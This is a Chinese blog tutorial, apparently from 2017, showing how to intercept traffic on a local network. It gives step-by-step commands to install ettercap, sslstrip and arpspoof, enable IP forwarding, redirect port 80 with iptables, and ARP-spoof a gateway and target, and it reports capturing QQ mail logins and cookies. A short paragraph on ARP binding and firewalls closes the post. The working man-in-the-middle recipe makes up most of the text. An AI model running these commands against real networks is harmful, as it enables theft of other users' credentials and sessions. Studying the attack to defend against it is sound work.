美文网首页python小项目练习
实现简单的网络嗅探

实现简单的网络嗅探

作者: 编程小蝉 | 来源:发表于2017-06-26 17:42 被阅读360次

首先声明一下这个技术不是原创的,而且这个工具也比较老了主要是帮助大家稍微理解一下黑客在局域网中是怎么获取数据的。首先我们来看一下程序运行的逻辑图

Paste_Image.png

一、准备工作:

我们需要安装几个软件我的环境是centos6.5
使用yum安装:

yum -y install ettercap
yum -y install arpspoof sslstrip 
yum -y install arpspoof
yum -y install dsniff ssldump

二、开启路由转发

因为我们在伪装成了路由器之后 我们需要把用户的数据转发到路由器,所有需要开启我机器的路由转发功能

echo ‘1’ > /proc/sys/net/ipv4/ip_forward   #也可以手动去修改

三、开启iptables

通过iptableshttp数据导入到10000端口我们用sslstrip监听10000端口并得到我们想要的数据:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
-t 表示要操作的表 nat表示修改nat表
-A 追加数据  PREROUTING路由前的链 追加一条规则到路由前的链
-p 指的是被过滤包的协议
--destination-port 80指被过滤包的目的端口是80 后面指的是将80端口的数据转发到10000端口

四、启动sslstrip监控10000端口

sslstrip  -l 10000

五、利用ettercap进行arp欺骗(也就是伪装成路由器)

ettercap -T -q -M arp:remote /172.16.85.1/172.16.85.2/
-T 表示基于文本界面 因为在linux里面运行
-q  静默模式(不回显)
-M  启动arp欺骗攻击  (这一步就是伪装路由器)

//里面填写需要嗅探的机器IP 可以填入网段表示嗅探一个网段说有的信息
效果:

Paste_Image.png

我们登录了qq获取了qq邮箱的登录账号和密码 但是密码是加密的.我们只能通过下载cookie导入到自己的电脑来登录,不能直接获取密码了.
下面说下防御:
Sslstrip的攻击方式是一种中间人攻击,需要进行arp欺骗,也就是说如果不能获取你的数据他的工具再好也破解不到你的数据,所有我们需要设置好浏览器本身的安全以及需要绑定macip和网关和本机双向绑定,或者启动arp防火墙arp攻击进行防御。

如果您对网络安全和Python方面有兴趣,欢迎加群 526929231进行交流学习哦!

相关文章

  • 实现简单的网络嗅探

    首先声明一下这个技术不是原创的,而且这个工具也比较老了主要是帮助大家稍微理解一下黑客在局域网中是怎么获取数据的。首...

  • 网络嗅探

    1、 (1)Why要内网渗透:安全机制严,正面突破难;内网间信任,攻击更容易。 (2)内网渗透技术:嗅探、假消息攻...

  • scapy简单实现嗅探功能

    一、安装环境 pip install scapypip install pypcapfapt-get instal...

  • 想知道如何写一个网络包探嗅器吗?Python教你

    基本嗅探器 嗅探器是一种程序,它可以逐包捕获/嗅探/检测网络流量包,并对其进行各种原因的分析。常用于网络安全领域。...

  • 《wireshark数据包分析实战》

    wireshark介绍 一款网络流量包嗅探软件,在windows系统基于winpcap接口实现,支持htt...

  • dns欺骗

    一、Ettercap 使用教程 EtterCap是一个基于ARP地址欺骗方式的网络嗅探工具。它具有动态连接嗅探、动...

  • 嗅探

    一般指嗅探器。嗅探器 可以窃听网络上流经的数据包。 用集线器hub组建的网络是基于共享的原理的, 局域网内所...

  • 安全测试工具

    Webscarb HTTP/HTTPS代理工具 Wireshark 网络嗅探工具 Symantec...

  • 2018-05-30

    以腾讯云IoT Suite为例 谈谈边缘计算在物联网的实践与实现 四个 Linux 上的网络信息嗅探工具 Micr...

  • 一个简易网络嗅探器的实现

    由于很多网络(常见共享HUB连接的内部网)是基于总线方式,物理上是广播的,即当一个机器发给另一个机器数据,共享HU...

网友评论

    本文标题:实现简单的网络嗅探

    本文链接:https://www.haomeiwen.com/subject/umdjcxtx.html